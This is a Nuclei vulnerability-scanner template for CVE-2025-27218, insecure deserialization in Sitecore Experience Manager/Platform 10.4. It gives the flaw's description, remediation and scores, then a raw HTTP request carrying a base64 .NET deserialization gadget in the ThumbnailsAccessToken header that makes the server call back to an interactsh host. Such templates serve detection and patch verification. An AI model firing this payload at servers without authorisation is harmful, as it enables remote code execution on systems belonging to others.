id: CVE-2025-27218

info:
  name: Sitecore Experience Manager (XM)/Experience Platform (XP) 10.4 - Insecure Deserialization
  author: iamnoooob,rootxharsh,pdresearch
  severity: medium
  description: |
    Sitecore Experience Manager (XM) and Experience Platform (XP) 10.4 before KB1002844 allow remote code execution through insecure deserialization.
  impact: |
    Unauthenticated attackers can execute arbitrary code through insecure deserialization in the ThumbnailsAccessToken header, potentially gaining complete control over the Sitecore server.
  remediation: |
    Apply the KB1002844 update for Sitecore Experience Manager (XM)/Experience Platform (XP) 10.4.
  reference:
    - https://slcyber.io/blog/sitecore-unsafe-deserialization-again-cve-2025-27218/
    - https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1003535
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-27218
    cwe-id: CWE-94
    epss-score: 0.6356
    epss-percentile: 0.99109
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2025,oast,oob,sitecore,rce,vkev,vuln

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        ThumbnailsAccessToken: {{ base64(base64_decode('AAEAAAD/////AQAAAAAAAAAEAQAAAClTeXN0ZW0uU2VjdXJpdHkuUHJpbmNpcGFsLldpbmRvd3NJZGVudGl0eQEAAAAkU3lzdGVtLlNlY3VyaXR5LkNsYWltc0lkZW50aXR5LmFjdG9yAQYCAAAAkA==') + hex_decode('0a') + base64(replace(base64_decode('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'),'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbcccccccdddd', padding('http://{{interactsh-url}}/?','A',58,'suffix'))) + base64_decode('Cw==')) }}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - dns

      - type: word
        part: header
        words:
          - SC_ANALYTICS_GLOBAL_COOKIE
# digest: 4a0a004730450220353dee68a1caf806a8fc7f1dc47be24633912b1b8f6636cbcddd3682004e9f0c0221009aae00206e51e4cd975cb066e36e7f50f8e25a02e79e9bce82779ec67b6d00f7:922c64590222798bb761d5b6d8e72950